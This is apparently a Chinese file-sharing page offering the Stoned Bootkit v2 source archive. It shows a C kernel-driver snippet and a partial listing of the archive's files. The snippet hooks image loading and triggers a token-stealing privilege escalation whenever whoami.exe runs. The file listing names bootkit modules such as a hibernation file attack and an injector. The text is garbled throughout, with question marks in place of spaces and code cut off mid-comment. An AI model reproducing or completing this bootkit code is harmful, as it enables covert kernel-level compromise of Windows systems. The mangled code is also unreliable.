資源簡介
Stoned Bootkit v2源代碼 附送Antivirus Tracker complete
從官網上下載的就是這個zip了,原汁原味.
官網http://www.stoned-vienna.com/不知道為什么上不了了.這里算是個存檔吧
一個分,大家懂的..
代碼片段和文件信息
//?Black?Hat?USA?2009?Briefings?“Stoned?Bootkit“?POC
//?.04$?to?Vipin?Kumar
/*?includes?and?included?definitions?*/
#include?“ntddk.h“
#include?“ntdddisk.h“
#include?“windef.h“
/*?forward?declarations?*/
void?NotifyRoutine(IN?PUNICODE_STRING?FullImageName?IN?HANDLE?ProcessId?IN?PIMAGE_INFO??ImageInfo);
void?PrivilegeEscalation(IN?PVOID?StartContext);
/*?Stoned?Bootkit?framework?includes?*/
#define?SbNotifyDriverLoad????0
#define?SbInstallWindowsHook??2
#define?HookType_Hook?????????0???//?hooking?a?function?=?control?passed?to?hook?then?original?function?is?called????????(before?a?function?is?called)
#define?HookType_Intercept????1???//?intercepting?a?function?=?getting?function?parameters?return?value?and?return?eip???(after?a?function?is?called)
struct
{
??void?*?FunctionName;
??void?*?FunctionHook;
??unsigned?Type;
}?Hook;
/*?the?real?true?driver?entry?point?name?it?always?GsDriverEntry@8?*/
NTSTATUS?GsDriverEntry(void?*?ModuleAddress?int?(*?StonedCallback)(unsigned?FunctionNumber?void?*?Param))
{
??object_ATTRIBUTES?objectAttributes;
//??DbgPrint(“\nYour?PC?is?now?Stoned!??..again!\n\n“);
??
??//?create?the?thread
??InitializeobjectAttributes(&objectAttributes?NULL?OBJ_KERNEL_HANDLE?NULL?NULL);
??//?only?act?on?newly?loaded?images?-?which?is?a?safe?method
??PsSetLoadImageNotifyRoutine(&NotifyRoutine);
??
??//?at?unload?image?we?should?restore?security?tokens!
??
??return?STATUS_SUCCESS;
}
/*?disable?further?debug?output?*/
#define?DbgPrint
/*?check?every?new?loaded?image?if?to?privilege?escalate?*/
void?NotifyRoutine(IN?PUNICODE_STRING?FullImageName?IN?HANDLE?ProcessId?IN?PIMAGE_INFO??ImageInfo)
{
??DbgPrint(“Image?Load:?%wZ\n“?FullImageName);
??
//??Image?Load:?\Device\HarddiskVolume1\Windows\system32\cmd.exe??????????????not?recommended?keeps?crashing
//??Image?Load:?\Device\HarddiskVolume1\Windows\System32\whoami.exe???????????Vista
//??Image?Load:?\Device\HarddiskVolume1\Programme\Support?Tools\whoami.exe????XP
??if?(_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume1\\Programme\\Support?Tools\\whoami.exe“?58)?==?0?||
????_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume1\\Windows\\System32\\whoami.exe“?51)?==?0???||
????_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume2\\Windows\\System32\\whoami.exe“?51)?==?0???||
????_wcsnicmp(FullImageName->Buffer?L“\\Device\\HarddiskVolume3\\Windows\\System32\\whoami.exe“?51)?==?0???)
????PrivilegeEscalation(NULL);
}
/*?Vipin?Kumar?Black?Hat?Europe?2007?vbootkit?inspired?privilege?escalation?*/
void?PrivilegeEscalation(IN?PVOID?StartContext)
{
??PEPROCESS?CurrentProcess?ServiceProcess?FirstProcess;
??DWORD?ServiceSecurityToken;
??RTL_OSVERSIONINFOW?OSVersionInfo;
??DWORD?OffsetAPL?OffsetIN?OffsetST;
??CurrentProcess?=?IoGetCurrentProcess();
/*??OS??????????????????????ActiveProcesslink???ImageName???????????SecurityToken
????Windows?2000???? ?屬性????????????大小?????日期????時間???名稱
-----------?---------??----------?-----??----
?????文件???????83382??2010-06-06?00:29??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.1.zip
?????文件???????86044??2010-06-06?16:12??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.2.zip
?????文件???????97881??2010-08-20?10:23??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.3.zip
?????文件???????20460??2010-02-20?14:55??Stoned?Bootkit?and?Antivirus?Tracker?complete\AV?Tracker?1.zip
?????文件???????14149??2010-12-20?18:32??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?Files?(Auflistung).txt
?????目錄???????????0??2010-12-20?18:35??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\
?????文件????????5851??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Advanced.txt
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\
?????文件????????2300??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Forensic?Lockdown?Software.asm
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\
?????文件????????6690??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Boot?Menu.asm
?????文件?????????985??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\File?Manager.asm
?????文件?????????967??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Lock?Menu.asm
?????文件????????1916??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Settings.asm
?????文件????????6351??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Shutdown.asm
?????文件???????10810??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\Unlock?Menu.asm
?????文件????????9575??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\Menu\User?Interface.asm
?????文件????????9342??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\Code\User?Interface.asm
?????文件?????????359??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\release.cmd
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Forensic?Lockdown?Software\System?Files\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\
?????文件????????2441??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\BHE2009e.asm
?????文件????????3563??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\Hibernation?File?Attack.asm
?????文件???????29392??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\Code\Injector.asm
?????文件?????????347??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\release.cmd
?????目錄???????????0??2010-12-20?18:34??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Applications\Hibernation?File?Attack\System?Files\
?????文件??????????64??2010-12-20?18:33??Stoned?Bootkit?and?Antivirus?Tracker?complete\Bootkit?full?version?January?2010\Boot?Code\Boot?Records.bat
............此處省略189個文件信息
評論
共有 條評論
川公網安備 51152502000135號